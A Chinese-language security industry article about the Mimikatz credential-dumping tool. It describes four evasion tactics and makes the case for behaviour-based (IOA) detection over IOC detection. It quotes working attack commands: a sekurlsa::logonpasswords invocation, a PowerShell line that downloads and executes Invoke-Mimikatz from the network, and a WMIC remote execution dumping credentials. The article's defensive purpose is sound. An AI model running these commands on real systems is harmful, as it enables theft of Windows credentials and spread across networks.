公司动态 行业动态 安全通告

简单粗暴:网络攻击界的AK47

日期:2019-05-23 11:00:32 投稿人:

Mimikatz是一款广受犯罪团伙与流氓国家欢迎的开源提权工具包。很多安全业内人士都听说过这款工具的大名,但对没有听说过的人而言,那就是一个巨大的威胁。这款工具堪称网络攻击武器库中的AK47,即便没到攻击者人手一把的程度,也几乎可以当成是网络攻击团伙标配了。对此一无所知的人可能面临或已经遭遇了它的侵害。


图片1.png

无论对手是谁,几乎所有Windows入侵当中都能见到它的身影。这不仅仅是一种流行的凭证获取方法,也是针对性攻击者和渗透测试人员都常用的凭证获取工具,因为其绕过基于特征码检测的功能和有效性都十分强大。

攻击者常会寻找有效凭证以提升权限并扩展其在目标环境中的染指范围,获得有效凭证的方法也是八仙过海各显神通,有些攻击者甚至针对同一个目标都会采用多种凭证盗窃技术。

Mimikatz采用4种主要战术:

  1. 修改可执行文件名称

  2. 运用批处理文件

  3. 采用PowerShell变种

  4. 改变命令行选项

我们不妨仔细分析一下。

1. 隐蔽:修改可执行文件名称

攻击者使用该工具最简单直接的方法就是将其拷贝到被入侵的系统中,修改可执行文件的文件名,用以下命令行启动之:

c:\ProgramData\p.exe “”privilege::debug””

“”sekurlsa::logonpasswords””

如此这般,系统的凭证信息便落入了攻击者手中。

2. 有效:使用批处理文件

运用该工具的其他方式还包括采用批处理文件将工具拷贝到目标系统执行,然后将结果输出到一个文件,并将该输出文件拷回中心收集点,最后再在目标系统上删除所有相关文件。

3. 召唤力量支援:采用PowerShell变种

采用Mimikatz的PowerShell变种是又一种获取目标系统凭证信息的方法,比如:

powershell -ep Bypass -NoP -NonI -NoLogo -c IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent[.]com/[REDACTED]/Invoke-Mimikatz.ps1’);Invoke-Mimikatz -Command ‘privilege::debug sekurlsa::logonpasswordsexit’

4. 改变命令行选项

2018年第四季度见证了Mimikatz工具的另类用法,尤其是修改命令行选项的一种:

mnl.exe pr::dg sl::lp et -p

该特殊的Mimikatz变种通过WMIC.exe对多个目标系统下手,比如:

Wmic /NODE:”[REDACTED]” /USER:”[REDACTED]” /password:[REDACTED] process call create “cmd.exe /c (c:\windows\security\mnl.exe pr::dg sl::lp et -p >c:\windows\security\PList.txt) >> c:\windows\temp\temp.txt”

花招迭出:需要全面的应对方法

这一系列有效战术充分显示出监测攻击指标(IOA)的重要性。每种技术都是逃避脆弱检测方法的尝试,这些脆弱检测方法要么只检测命令行选项以推断其目的,要么只检查二进制文件中有没有出现相关字符串。

攻击者可以运用多种技术获取凭证信息,但公司企业需要一定程度的可见性以便防御者能够观察到攻击者所用的新技术,包括被特别用于绕过和颠覆检测机制的那些。

攻击指标(IOA)专注于攻击技术的行为特征,而不是像文件名、散列值或单个命令行选项这样的传统入侵指标(IOC)。新一代IOA过程能赋予防御者看清新攻击技术的能力,即便攻击者使用了专门的规避或颠覆检测机制的方法。这是因为IOA着眼攻击者的意图,而万变不离其宗,无论攻击者使用哪种恶意软件或漏洞利用程序,终归逃不脱其恶意目的,只要盯紧攻击意图,攻击便无所遁形。

网络取证领域中,IOC往往被描述为计算机上留存的指征网络安全被破坏的证据。在接到可疑事件通报,或是定期检查,亦或发现网络中非正常呼出后,调查人员往往会去收集这些数据。理想状况下,这些信息被收集以后能够创建更智能的工具,可以检测并隔离未来的可疑文件。因为IOC提供的是跟踪坏人的反应式方法,当你发现IOC时,有极大的可能性已经被黑了。

此类IOC指征一系列恶意活动,从简单的I/O操作到提权都有。注重行为特征的IOA关联则将这些指标都综合到一起,用以检测并防止恶意行为。其结果就是连通过反射注入PowerShell模块进行的凭证盗窃都能检测出来的防御技术,可以在攻击者实际观测到凭证前扼住该凭证盗取行为。

与基于特征码的杀毒软件类似,基于IOC的检测方法无法检测无恶意软件的威胁和零日漏洞攻击。因此,公司企业纷纷转向基于IOA的方法以便更好地适应其安全需求。


文章来源:安全牛